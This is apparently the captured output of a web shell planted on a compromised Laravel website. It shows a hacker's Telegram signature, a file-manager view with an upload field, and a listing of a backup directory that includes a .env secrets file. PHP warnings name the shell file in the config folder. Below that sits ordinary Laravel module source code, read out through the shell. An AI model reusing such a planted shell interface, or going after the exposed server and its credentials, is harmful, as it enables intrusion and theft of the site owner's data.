telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log4190444 KBJuly 20 2025 00:27:150644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
name = $name; $this->path = $path; $this->cache = $app['cache']; $this->files = $app['files']; $this->translator = $app['translator']; $this->activator = $app[ActivatorInterface::class]; $this->app = $app; } /** * Returns an array of assets * * @return array */ public static function getAssets(): array { $paths = []; if (file_exists('build/manifest.json')) { $files = json_decode(file_get_contents('build/manifest.json'), true); if (is_array($files)) { foreach ($files as $file) { if (isset($file['src'])) { $paths[] = $file['src']; } } } } return $paths; } /** * Get name. * * @return string */ public function getName(): string { return $this->name; } /** * Get name in lower case. * * @return string */ public function getLowerName(): string { return strtolower($this->name); } /** * Get name in studly case. * * @return string */ public function getStudlyName(): string { return Str::studly($this->name); } /** * Get name in snake case. * * @return string */ public function getSnakeName(): string { return Str::snake($this->name); } /** * Get description. * * @return string */ public function getDescription(): string { return $this->get('description'); } /** * Get priority. * * @return string */ public function getPriority(): string { return $this->get('priority'); } /** * Get path. * * @return string */ public function getPath(): string { return $this->path; } /** * Set path. * * @param string $path * * @return $this */ public function setPath($path): Module { $this->path = $path; return $this; } /** * Bootstrap the application events. */ public function boot(): void { if (config('modules.register.translations', true) === true) { $this->registerTranslation(); } if ($this->isLoadFilesOnBoot()) { $this->registerFiles(); } $this->fireEvent('boot'); } /** * Register module's translation. * * @return void */ protected function registerTranslation(): void { $lowerName = $this->getLowerName(); $langPath = $this->getPath() . '/Resources/lang'; if (is_dir($langPath)) { $this->loadTranslationsFrom($langPath, $lowerName); } } /** * Get json contents from the cache, setting as needed. * * @param string $file * * @return Json */ public function json($file = null): Json { if ($file === null) { $file = 'module.json'; } return Arr::get($this->moduleJson, $file, function () use ($file) { return $this->moduleJson[$file] = new Json($this->getPath() . '/' . $file, $this->files); }); } /** * Get a specific data from json file by given the key. * * @param string $key * @param null $default * * @return mixed */ public function get(string $key, $default = null) { return $this->json()->get($key, $default); } /** * Get a specific data from composer.json file by given the key. * * @param $key * @param null $default * * @return mixed */ public function getComposerAttr($key, $default = null) { return $this->json('composer.json')->get($key, $default); } /** * Register the module. */ public function register(): void { $this->registerAliases(); $this->registerProviders(); if ($this->isLoadFilesOnBoot() === false) { $this->registerFiles(); } $this->fireEvent('register'); } /** * Register the module event. * * @param string $event */ protected function fireEvent($event): void { $this->app['events']->dispatch(sprintf('modules.%s.' . $event, $this->getLowerName()), [$this]); } /** * Register the aliases from this module. */ abstract public function registerAliases(): void; /** * Register the service providers from this module. */ abstract public function registerProviders(): void; /** * Get the path to the cached *_module.php file. * * @return string */ abstract public function getCachedServicesPath(): string; /** * Register the files from this module. */ protected function registerFiles(): void { foreach ($this->get('files', []) as $file) { include $this->path . '/' . $file; } } /** * Handle call __toString. * * @return string */ public function __toString() { return $this->getStudlyName(); } /** * Determine whether the given status same with the current module status. * * @param bool $status * * @return bool */ public function isStatus(bool $status): bool { return $this->activator->hasStatus($this, $status); } /** * Determine whether the current module activated. * * @return bool */ public function isEnabled(): bool { return $this->activator->hasStatus($this, true); } /** * Determine whether the current module not disabled. * * @return bool */ public function isDisabled(): bool { return !$this->isEnabled(); } /** * Set active state for current module. * * @param bool $active * * @return void */ public function setActive(bool $active): void { $this->activator->setActive($this, $active); } /** * Disable the current module. */ public function disable(): void { $this->fireEvent('disabling'); $this->activator->disable($this); $this->flushCache(); $this->fireEvent('disabled'); } /** * Enable the current module. */ public function enable(): void { $this->fireEvent('enabling'); $this->activator->enable($this); $this->flushCache(); $this->fireEvent('enabled'); } /** * Delete the current module. * * @return bool */ public function delete(): bool { $this->activator->delete($this); return $this->json()->getFilesystem()->deleteDirectory($this->getPath()); } /** * Get extra path. * * @param string $path * * @return string */ public function getExtraPath(string $path): string { return $this->getPath() . '/' . $path; } /** * Check if can load files of module on boot method. * * @return bool */ protected function isLoadFilesOnBoot(): bool { return config('modules.register.files', 'register') === 'boot' && // force register method if option == boot && app is AsgardCms !class_exists('\Modules\Core\Foundation\AsgardCms'); } private function flushCache(): void { if (config('modules.cache.enabled')) { $this->cache->store(config('modules.cache.driver'))->flush(); } } /** * Register a translation file namespace. * * @param string $path * @param string $namespace * @return void */ private function loadTranslationsFrom(string $path, string $namespace): void { $this->translator->addNamespace($namespace, $path); } }